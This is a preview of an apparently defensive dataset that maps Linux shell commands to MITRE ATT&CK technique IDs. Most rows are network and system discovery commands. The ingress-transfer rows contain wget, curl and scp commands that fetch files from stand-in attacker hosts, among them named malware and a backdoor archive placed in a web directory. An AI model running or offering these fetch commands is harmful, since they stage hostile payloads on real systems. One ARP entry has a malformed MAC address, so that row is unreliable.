Technique stringclasses 5
values | Command stringlengths 6 194 |
|---|---|
T1016 | ip addr show |
T1016 | ip -6 addr show |
T1016 | ss -tln |
T1016 | ss -tn |
T1016 | ifconfig -a |
T1016 | arp -a |
T1016 | route -n |
T1016 | netstat -i |
T1105 | wget https://attackerserver/malicious.sh -O /tmp/malicious.sh |
T1105 | scp user@remote:/path/to/malicious.exe /tmp/malicious.exe |
T1105 | scp /path/to/malicious.so user@remote:/tmp/malicious.so |
T1105 | wget ftp://attackerserver/malicious.py -O /tmp/malicious.py |
T1016 | ip link show |
T1016 | ip route show |
T1016 | ip neigh show |
T1016 | ip -s link show |
T1016 | ip -s addr show |
T1016 | ip -s route show |
T1016 | ip -s neigh show |
T1016 | ss -tuna |
T1016 | ss -ln |
T1016 | ss -lnp |
T1016 | ss -lnt |
T1016 | ss -lnp -t |
T1016 | ss -lnp -t -o |
T1016 | ss -lnp -t -o state established |
T1016 | route -A inet |
T1016 | route -A inet6 |
T1016 | route -A inet add |
T1016 | ip maddr show |
T1016 | ip -d link show |
T1016 | ss -t -a |
T1016 | ss -u -a |
T1016 | ss -t -n |
T1016 | ss -u -n |
T1016 | ss -x -n |
T1016 | route -A inet6 -n |
T1016 | route -A inet -n |
T1059 | env -i PATH=/usr/bin:/bin command |
T1016 | ss -tun |
T1016 | ifconfig eth0 |
T1016 | netstat -rn |
T1016 | ip addr flush dev eth0 |
T1016 | ss -tnlp |
T1016 | route -A inet add default gw 192.168.1.1 |
T1016 | ifconfig eth0 up |
T1016 | arp -d 192.168.1.1 |
T1016 | ip route add 192.168.2.0/24 via 192.168.1.2 |
T1016 | ifconfig lo up |
T1016 | arp -s 192.168.1.1 00:1A:2B:3 |
T1033 | id -un |
T1033 | who -u |
T1016 | ip tuntap list |
T1016 | ip l2tp show |
T1016 | ip mptcp show |
T1016 | ss -an |
T1016 | route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.0.1 |
T1105 | curl -O https://malicious.com/file |
T1105 | scp user@remote:/path/to/malicious/file /local/path |
T1105 | wget https://malicious.com/file |
T1105 | curl -k https://malicious.com/file -o /local/path |
T1105 | curl -u username:password -O https://malicious.com/file |
T1105 | scp -i /path/to/private/key user@remote:/path/to/malicious/file /local/path |
T1016 | netstat -tuln |
T1105 | wget https://malicious.com/file.zip |
T1105 | scp user@remote:/path/to/localfile . |
T1105 | curl -o /tmp/malicious.jar https://malicious.com/app.jar |
T1082 | uname -a |
T1082 | lsb_release -a |
T1082 | uname -m |
T1082 | uname -r |
T1082 | hostname -f |
T1082 | uname -v |
T1082 | hostname -d |
T1016 | netstat -tulpn |
T1016 | ifconfig ens33 |
T1016 | ip -f inet6 addr show |
T1082 | hostname -s |
T1082 | hostname -I |
T1016 | ss -tunlp |
T1082 | uname -s |
T1082 | uname -n |
T1082 | lsb_release -d |
T1016 | ss -tuln |
T1105 | scp user@remote:/path/to/local/file /local/path/ |
T1105 | scp -P 2222 user@remote:/home/user/config /etc/ |
T1105 | scp -r user@remote:/var/log /mnt/backups/ |
T1059 | bash -o posix shopt -s expand_aliases |
T1059 | env LD_PRELOAD=/lib/libc.so.6 ls |
T1059 | env -C /tmp cd /etc && ls |
T1105 | scp user@remote:/path/to/file.pdf /local/path/ |
T1105 | curl -J -O https://malicious.com/malware.exe |
T1105 | wget -P /var/www/html -c http://malicious-site.com/backdoor.tgz |
T1105 | scp /home/user/downloads/malware.sh root@192.168.1.2:/root/ |
T1105 | scp user@remote:/path/to/local/file.txt . |
T1105 | scp -P 2222 user@remote:/path/to/remote/file /local/path |
T1105 | scp -r user@remote:/home/user/tools /local/tools |
T1033 | who -q |
T1105 | scp user@remote:/path/to/file /local/directory |
T1105 | scp -r user@remote:/dir /local |
End of preview. Expand in Data Studio
README.md exists but content is empty.
- Downloads last month
- 19